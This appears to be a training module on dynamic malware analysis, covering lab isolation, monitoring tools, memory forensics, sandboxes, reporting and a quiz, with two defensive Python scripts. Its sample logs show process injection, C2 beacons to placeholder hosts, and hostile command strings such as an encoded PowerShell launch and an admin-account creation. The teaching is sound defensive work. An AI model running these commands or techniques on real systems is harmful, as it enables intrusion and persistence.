Dynamic Analysis
SECTION 01

What is Dynamic Analysis?

Dynamic analysis is the art of observing malware in action. Unlike static analysis where you examine the file without running it, dynamic analysis involves executing the sample in a controlled environment and watching what it does.

Think of it like this: static analysis is reading the cookbook; dynamic analysis is watching the chef cook.

Behavioral
See what malware actually does, not what it claims
Defeats Obfuscation
Packed code must unpack itself to run
Network Activity
Capture C2 communications in real-time
Time-Based
Observe behaviors that trigger on conditions

When to Use Dynamic vs Static

Use Static When:

  • Initial triage / quick assessment
  • Sample is heavily packed
  • You need to find all possible code paths
  • Sample won't run in your environment

Use Dynamic When:

  • Need to see actual behavior
  • Investigating C2 infrastructure
  • Sample uses anti-analysis tricks
  • Time to understand < time to reverse
CRITICAL WARNING: Dynamic analysis means running live malware. ALWAYS do this in an isolated VM with snapshots. One mistake can compromise your entire network. If you're unsure, use automated sandboxes instead.
SECTION 02

Setting Up Your Lab

Your analysis lab is your fortress. One mistake and malware escapes into your production network. Here's how to build a proper isolation environment:

VM Snapshots
Take before every analysis. Revert immediately after.
Network Isolation
Host-only network or completely disconnected
Fake Internet
INetSim simulates common services
Fake DNS
FakeDNS catches all domain queries

Essential Tools Setup

# INetSim - Simulates internet services
sudo apt install inetsim
sudo service inetsim start

# Configure VM to use INetSim as DNS
# Set DNS to your INetSim host IP (e.g., 192.168.56.1)

# FakeDNS - Python alternative
git clone https://github.com/Crypt0s/FakeDNS
cd FakeDNS
python fakedns.py -c fakedns.conf
Pro Tip: Create a "golden image" VM with all analysis tools pre-installed. Clone it for each analysis, run sample, then delete the clone. Never analyze directly on the golden image.

Network Isolation Methods

Host-Only Network (Recommended)

VM can talk to host machine only. Perfect for running INetSim on host and capturing traffic.

Internal Network

Multiple VMs can talk to each other but not outside. Good for multi-machine infections.

Completely Disconnected

No network at all. Safest but limits analysis of network behavior.

Important: Sophisticated malware can detect VMs and alter behavior. Change MAC addresses, customize VM artifacts, and use bare-metal if analyzing advanced threats.
Guided Walkthrough: Analyzing a Suspicious Process

Before diving into the tools, let's walk through analyzing a malware sample step by step. You'll build a behavior diagram as you identify each indicator.

Sandbox Log: sample_7f3a.exe (PID 2048)
[09:14:01] CreateProcess sample_7f3a.exe
[09:14:01] OpenProcess(explorer.exe)
[09:14:01] VirtualAllocEx(explorer.exe)
[09:14:01] WriteProcessMemory(explorer.exe)
[09:14:02] CreateRemoteThread(explorer.exe)
[09:14:05] DNS: c2-relay.darknet.io
[09:14:05] HTTP POST /gate.php
[09:14:06] HTTP POST /gate.php (60s)
[09:14:08] CreateFile %TEMP%\payload.dll
[09:14:08] WriteFile %TEMP%\payload.dll
[09:14:09] CopyFile → %APPDATA%\svc.exe
[09:14:10] RegSetValue Run\SystemSvc
[09:14:10] SchTasks /Create /TN Update
Behavior diagram built from the log:

sample_7f3a.exe (PID 2048)
  API - Process Injection: VirtualAllocEx → WriteProcessMemory → CreateRemoteThread
  NET - C2 Beacon: c2-relay.darknet.io, POST /gate.php, interval: 60s
  Filesystem Modifications: %TEMP%\payload.dll (dropped), %APPDATA%\svc.exe (installed copy)
  Persistence Mechanisms: Registry: HKCU\...\Run\SystemSvc; Scheduled Task: "Update"
  CLASSIFICATION: RAT / Backdoor Trojan
Walkthrough complete! You've built a full malware behavior diagram. Now explore each tool in the sections below.
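As an added example (not part of the original walkthrough), here is a small Python parser that turns a sandbox log in the format above into the same behavior profile and verdict an analyst builds by hand: it checks that the three injection calls hit the same target in order, collects C2 and file-drop indicators, and records both persistence mechanisms. The log is constructed to match the walkthrough and the profile key names are my own.

```python
import re
from collections import defaultdict

# Constructed sandbox log in the same shape as the walkthrough (not a real capture).
SANDBOX_LOG = r"""
[09:14:01] OpenProcess(explorer.exe)
[09:14:01] VirtualAllocEx(explorer.exe)
[09:14:01] WriteProcessMemory(explorer.exe)
[09:14:02] CreateRemoteThread(explorer.exe)
[09:14:05] DNS: c2-relay.darknet.io
[09:14:05] HTTP POST /gate.php
[09:14:08] CreateFile %TEMP%\payload.dll
[09:14:09] CopyFile -> %APPDATA%\svc.exe
[09:14:10] RegSetValue Run\SystemSvc
[09:14:10] SchTasks /Create /TN Update
"""
INJECTION_CHAIN = ("VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread")
LINE_RE = re.compile(r"^\[(\d\d:\d\d:\d\d)\]\s+([A-Za-z]+)(.*)$")

def parse(log):
    """Turn each '[hh:mm:ss] Op detail' line into a (time, op, detail) tuple."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, op, detail = m.groups()
            events.append((ts, op, detail.strip(" :()")))  # Op(target) / DNS: name -> bare detail
    return events

def build_profile(events):
    """Group events into the boxes of the behavior diagram."""
    profile = defaultdict(list)
    for i, (_, op, target) in enumerate(events):
        if op == INJECTION_CHAIN[0]:
            # The three calls must hit the same target process, in that order.
            seq = [o for _, o, d in events[i:] if d == target and o in INJECTION_CHAIN]
            if tuple(seq[:3]) == INJECTION_CHAIN:
                profile["process_injection"].append(target)
    for _, op, detail in events:
        if op in ("DNS", "HTTP"):
            profile["c2"].append(detail)
        elif op in ("CreateFile", "CopyFile"):
            path = detail.split("->")[-1].strip()
            if path.startswith(("%TEMP%", "%APPDATA%")):  # drops into user-writable dirs
                profile["dropped_files"].append(path)
        elif op == "RegSetValue" and "Run\\" in detail:
            profile["persistence"].append("registry: " + detail)
        elif op == "SchTasks" and "/Create" in detail:
            profile["persistence"].append("scheduled task: " + detail.split("/TN")[-1].strip())
    return profile

def classify(p):
    """Same verdict logic the walkthrough applies by hand."""
    return "RAT / Backdoor Trojan" if p["process_injection"] and p["c2"] and p["persistence"] else "Unclassified"
```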
SECTION 03

Execution Monitoring with Process Monitor

Process Monitor (ProcMon) is your window into everything happening on the system. Every file access, registry change, and process creation - all in real-time.

File System
CreateFile, WriteFile, DeleteFile
Registry
RegSetValue, RegCreateKey
Network
TCP/UDP connections
Process
CreateProcess, Thread creation

Interactive ProcMon Filter Builder

Process Monitor - Filter Configuration (filter on Process Name, Operation, Result; sample capture below):
12:34:56 malware.exe CreateFile C:\Users\victim\AppData\Roaming\updater.exe SUCCESS
12:34:57 malware.exe WriteFile C:\Users\victim\AppData\Roaming\updater.exe SUCCESS
12:34:58 malware.exe RegSetValue HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater SUCCESS
12:34:59 malware.exe TCP Connect 185.234.219.45:8080 SUCCESS
12:35:00 explorer.exe ReadFile C:\Windows\explorer.exe SUCCESS
12:35:01 malware.exe CreateFile C:\Windows\System32\drivers\rootkit.sys ACCESS DENIED
First-Run Capture Technique: Start ProcMon BEFORE running the sample, then let it run for 30-60 seconds. Look for the initial burst of activity - that's usually the most revealing. Save the log before the noise becomes overwhelming.
Key Indicators to Watch For:
  • Persistence: Registry Run keys, Startup folder writes
  • File Drops: New executables in %APPDATA%, %TEMP%
  • Credential Theft: Reads from SAM, LSA, browser databases
  • Lateral Movement: Writes to network shares, PsExec activity
SECTION 04

API Tracing & Hooking

API Monitor shows you the actual Windows API calls a process makes - the low-level functions that do the real work. This is deeper than ProcMon's high-level operations.

Key API Categories to Monitor

File APIs
CreateFileW, WriteFile, DeleteFileW, MoveFileEx
Registry APIs
RegOpenKeyEx, RegSetValueEx, RegDeleteKey
Network APIs
WSAStartup, connect, send, recv, InternetOpen
Process APIs
CreateProcess, VirtualAllocEx, WriteProcessMemory

Live API Trace Example

API Monitor - Malware API Calls
GetSystemInfo SYSTEM
Parameters: ( )
Returns: [System Information Structure]
VirtualAllocEx MEMORY
hProcess: 0x1234 (explorer.exe), dwSize: 4096, flProtect: PAGE_EXECUTE_READWRITE
Returns: 0x7FFF0000
WriteProcessMemory MEMORY
hProcess: 0x1234 (explorer.exe), lpBaseAddress: 0x7FFF0000, nSize: 2048
Returns: TRUE
CreateRemoteThread PROCESS
hProcess: 0x1234 (explorer.exe), lpStartAddress: 0x7FFF0000
Returns: 0x5678 (Thread Handle)
InternetOpenW NETWORK
lpszAgent: "Mozilla/5.0", dwAccessType: INTERNET_OPEN_TYPE_DIRECT
Returns: 0x9ABC (Internet Handle)
HttpOpenRequestW NETWORK
lpszObjectName: "/gate.php", lpszVerb: "POST"
Returns: 0xDEF0 (Request Handle)
RegSetValueExW REGISTRY
hKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Run, lpValueName: "SystemUpdate", lpData: "C:\Users\victim\AppData\updater.exe"
Returns: ERROR_SUCCESS
Classic Process Injection Pattern: The sequence VirtualAllocEx → WriteProcessMemory → CreateRemoteThread is textbook process injection. The malware allocated memory in explorer.exe, wrote shellcode, and executed it. This is how it hides in legitimate processes.

Understanding API Hooking

API hooking intercepts function calls to monitor or modify behavior. Tools like API Monitor insert themselves between the malware and Windows APIs to capture everything.

Malware calls CreateFileW
    ↓
Hook intercepts call
    ↓
Hook logs: "CreateFileW(L\"secrets.txt\", GENERIC_READ, ...)"
    ↓
Hook forwards to real CreateFileW
    ↓
Returns result to malware
Pro Tip: Enable pre-defined API filters in API Monitor for "Cryptography" when analyzing ransomware. You'll immediately see CryptEncrypt calls that show what's being encrypted in real-time.
SECTION 05

Network Traffic Analysis

Wireshark is your network microscope. Every packet the malware sends - DNS queries, HTTP requests, C2 beacons - all captured and dissected.

DNS Queries
Domain lookups reveal C2 infrastructure
HTTP Traffic
POST/GET requests to command servers
SSL/TLS
Encrypted traffic (harder to analyze)
Raw TCP
Custom protocols on non-standard ports

Interactive Packet Analysis

Wireshark Capture - malware_traffic.pcap
Packet #1 DNS
Source: 192.168.1.100 Destination: 8.8.8.8 Query: c2-server.malicious-domain.com
Packet #2 DNS
Source: 8.8.8.8 Destination: 192.168.1.100 Answer: 185.234.219.45
Packet #3 TCP
Source: 192.168.1.100:49152 Destination: 185.234.219.45:8080 Flags: SYN (Connection Attempt)
Packet #4 HTTP
Method: POST /gate.php Host: 185.234.219.45 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Body: id=VICTIM-PC&os=Win10&ver=2.3&data=BASE64_ENCODED_DATA
Packet #5 HTTP
Status: 200 OK Content-Type: application/octet-stream Body: [Binary shellcode - 4096 bytes]
What Just Happened? The malware:
  1. Resolved C2 domain via DNS (Packet #1-2)
  2. Connected to C2 server (Packet #3)
  3. Sent victim information via POST (Packet #4)
  4. Received shellcode payload from C2 (Packet #5)
This is a classic C2 beacon followed by second-stage payload download.

SSL/TLS Inspection Challenges

Modern malware often uses HTTPS to hide C2 traffic. You have a few options:

SSL Interception Proxy

Install the proxy's CA certificate in the VM's trust store and route traffic through mitmproxy or Burp Suite to decrypt it. Samples that pin certificates or ship their own TLS stack will refuse the proxied connection; fall back to metadata analysis for those.

Metadata Analysis

Even encrypted, you can see: destination IPs, connection timing, packet sizes. Often enough to identify C2 patterns.
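The timing-and-size approach above, as an added example that is not from the original page: given connection metadata you can still read off a TLS capture (timestamps, destination, bytes sent), it flags destinations contacted at a near-constant interval with near-constant request sizes. The connection list is constructed; 185.234.219.45 is the C2 address used elsewhere on this page and 203.0.113.7 stands in for ordinary browsing.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed connection metadata: (seconds since capture start, source, dest ip:port, bytes sent).
CONNECTIONS = [
    (0.0,   "192.168.1.100", "185.234.219.45:443", 612),
    (3.2,   "192.168.1.100", "203.0.113.7:443",    4100),   # benign browsing (constructed)
    (40.0,  "192.168.1.100", "203.0.113.7:443",    9800),
    (60.4,  "192.168.1.100", "185.234.219.45:443", 615),
    (119.9, "192.168.1.100", "185.234.219.45:443", 610),
    (121.0, "192.168.1.100", "203.0.113.7:443",    300),
    (130.5, "192.168.1.100", "203.0.113.7:443",    15000),
    (180.7, "192.168.1.100", "185.234.219.45:443", 613),
    (240.1, "192.168.1.100", "185.234.219.45:443", 611),
]

def find_beacons(conns, min_count=4, max_cv=0.15):
    """Flag destinations whose inter-connection gaps and request sizes are regular.
    Regularity is the coefficient of variation (stddev / mean): a scripted beacon
    scores near 0, human-driven traffic near 1. Raise max_cv for beacons that add jitter."""
    by_dst = defaultdict(list)
    for ts, _src, dst, size in sorted(conns):
        by_dst[dst].append((ts, size))
    beacons = {}
    for dst, samples in by_dst.items():
        if len(samples) < min_count:          # too few contacts to judge periodicity
            continue
        gaps = [later[0] - earlier[0] for earlier, later in zip(samples, samples[1:])]
        sizes = [size for _, size in samples]
        gap_cv = pstdev(gaps) / mean(gaps)
        size_cv = pstdev(sizes) / mean(sizes)
        if gap_cv < max_cv and size_cv < max_cv:
            beacons[dst] = {"interval_s": round(mean(gaps), 1),
                            "count": len(samples), "gap_cv": round(gap_cv, 3)}
    return beacons
```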

Wireshark Display Filters:
  • http.request.method == "POST" - Find data exfiltration
  • dns.qry.name contains "pastebin" - Popular C2 channel
  • tcp.port != 80 && tcp.port != 443 - Non-standard ports
  • ip.addr == 192.168.1.100 && http - All HTTP from victim
SECTION 06

Memory Analysis

Memory is where secrets live. Decrypted payloads, injected code, command history, credentials - all sitting in RAM even if never written to disk.

Process Memory
Running code, loaded DLLs, heap allocations
Unpacked Code
Packed malware must unpack to execute
Credentials
Passwords, hashes, tokens in cleartext
Injected Code
Shellcode hidden in legitimate processes

Volatility Framework Basics

Volatility is the premier framework for memory forensics. Point it at a memory dump and extract running processes, network connections, injected code, and more.

# Volatility 3 syntax: the entry point is `vol` and plugins are namespaced (windows.*)
# List running processes
vol -f memory.dmp windows.pslist

# Show network connections
vol -f memory.dmp windows.netscan

# Detect process injection (executable private memory with no backing file)
vol -f memory.dmp windows.malfind

# Dump the memory of a specific process (by PID)
vol -f memory.dmp windows.memmap --pid 1234 --dump

# Extract the command line each process was started with
vol -f memory.dmp windows.cmdline

Memory Strings Analysis

Memory Dump Strings - malware.exe (PID 1234)
0x00400000 http://185.234.219.45:8080/gate.php URL
0x00401200 https://pastebin.com/raw/C2Config URL
0x00402400 SOFTWARE\Microsoft\Windows\CurrentVersion\Run REGISTRY
0x00403800 cmd.exe /c powershell -enc BASE64_PAYLOAD COMMAND
0x00404C00 MySecretEncryptionKey2024! CRYPTO KEY
0x00406000 net user admin P@ssw0rd123 /add COMMAND
0x00407400 ftp://backup-server.internal.local/exfil/ URL
Memory Dump Timing: Take a memory snapshot 30-60 seconds after malware execution. This captures initial unpacking and C2 communication before anti-analysis tricks kick in. Take multiple snapshots over time to catch time-delayed behaviors.
Common Memory Artifacts:
  • Mutexes: Unique strings malware uses to prevent multiple infections
  • Decrypted URLs: C2 domains that were encrypted in the binary
  • Shellcode: Small executable payloads injected into other processes
  • Configuration: C2 addresses, encryption keys, campaign IDs
SECTION 07

Automated Analysis & Sandboxes

Manual analysis is powerful but time-consuming. Automated sandboxes let you analyze hundreds of samples quickly, then manually investigate the interesting ones.

Cuckoo Sandbox
Self-Hosted / Open Source
  • Complete control and privacy
  • API call tracing
  • Network traffic capture
  • Memory dumps
  • YARA rule scanning
Best For: Organizations needing private analysis infrastructure or custom detection rules.
Any.Run
Cloud / Interactive
  • Real-time interaction with sample
  • Windows & Linux VMs
  • Built-in MITRE ATT&CK mapping
  • Threat intelligence integration
  • Public submission sharing
Best For: Quick analysis with ability to manually interact during execution.
Joe Sandbox
Cloud / Enterprise
  • Advanced behavior analysis
  • Code similarity detection
  • Mobile malware support
  • Deep API tracing
  • Detailed PDF reports
Best For: Enterprise environments needing comprehensive reports and threat correlation.

When to Use Automated vs Manual

Use Automation When:

  • Triaging large sample sets
  • Initial reconnaissance phase
  • Time-sensitive incident response
  • Known malware family confirmation
  • Quick IoC extraction needed

Use Manual When:

  • Advanced/targeted attack analysis
  • Sample uses sandbox evasion
  • Need to understand exact technique
  • Custom/unknown malware family
  • Preparing detailed threat report
Sandbox Evasion Techniques: Sophisticated malware can detect sandboxes and alter behavior. Look for:
  • VM artifact checks (VMware, VirtualBox registry keys)
  • Sleep/delay functions to timeout analysis
  • User interaction requirements (click dialogs, move mouse)
  • Geolocation checks (only runs in specific countries)
  • Time bombs (execute only at specific dates/times)
Hybrid Approach: Start with automated sandbox to get quick results and IoCs. If behavior looks interesting or sophisticated, switch to manual analysis for deeper investigation. Think of sandboxes as your first filter, not your only tool.
SECTION 08

Analysis Workflow & Documentation

Effective dynamic analysis follows a methodical workflow. Here's the process professional analysts use:

1. Preparation: Take VM snapshot, start monitoring tools (ProcMon, Wireshark, API Monitor), establish baseline
2. Execution: Launch malware, watch for initial burst of activity (first 60 seconds critical)
3. Observation: Monitor for 5-10 minutes, interact if needed (click dialogs, browse web), capture all logs
4. Memory Capture: Take memory dump of malicious process, pause VM before artifacts decay
5. Artifact Collection: Export logs (ProcMon, Wireshark), copy dropped files, document registry changes
6. Analysis: Review logs, analyze memory, identify IoCs, map to MITRE ATT&CK framework
7. Documentation: Write report with findings, IoCs, detection rules, and remediation steps

Report Writing Best Practices

Essential Report Sections:

Executive Summary
What it does in plain English. Threat level, affected systems, urgent actions needed.
Technical Analysis
Detailed behavior: persistence mechanisms, C2 communication, data exfiltration, lateral movement capabilities.
Indicators of Compromise (IoCs)
File hashes, IPs, domains, registry keys, mutex names, file paths - everything detection can use.
MITRE ATT&CK Mapping
Map observed behaviors to technique IDs (T1055, T1547.001, etc.) for threat hunting.
Detection & Remediation
YARA rules, Sigma rules, EDR queries, cleanup steps, hardening recommendations.
Pro Documentation Tip: Take screenshots of key moments - suspicious API calls, C2 traffic, process injection. A single screenshot can explain what takes paragraphs to write. Store them with meaningful filenames: 01-persistence-reg-key.png
SECTION 09

Analysis Challenge: Put Your Skills to Test

Scenario: Suspicious Email Attachment

You've received an incident report about a suspicious email attachment named Invoice_Q4_2024.exe. An employee opened it but claims "nothing happened."

After running dynamic analysis for 2 minutes, you observe the following behaviors. Based on what you've learned, what is the PRIMARY objective of this malware?

Observed Behaviors:
1. Creates: C:\Users\victim\AppData\Roaming\WindowsDefender\svchost.exe
2. RegSetValue: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefender
3. API: VirtualAllocEx → WriteProcessMemory → CreateRemoteThread (target: explorer.exe)
4. Network: HTTP POST to 45.142.212.61/panel/check.php
5. POST Body: hwid=ABC123&os=Win10&av=defender&admin=false
6. Response: {"status":"registered","interval":3600,"tasks":[]}
What is this malware's primary purpose?
Ransomware - Encrypts files and demands payment
Wiper - Destroys data to cause maximum damage
Trojan/Backdoor - Establishes persistent remote access for future commands
Information Stealer - Immediately harvests credentials and exfiltrates
Bonus Challenge: Attack Chain Analysis

Map the observed behaviors to MITRE ATT&CK techniques. Which technique ID corresponds to the registry persistence mechanism?

T1055.001 - Process Injection: DLL Injection
T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys
T1071.001 - Application Layer Protocol: Web Protocols
T1036.005 - Masquerading: Match Legitimate Name or Location

Module Complete!

You've mastered dynamic analysis techniques. You can now observe malware behavior in real-time, capture network communications, analyze memory, and document your findings like a professional analyst.
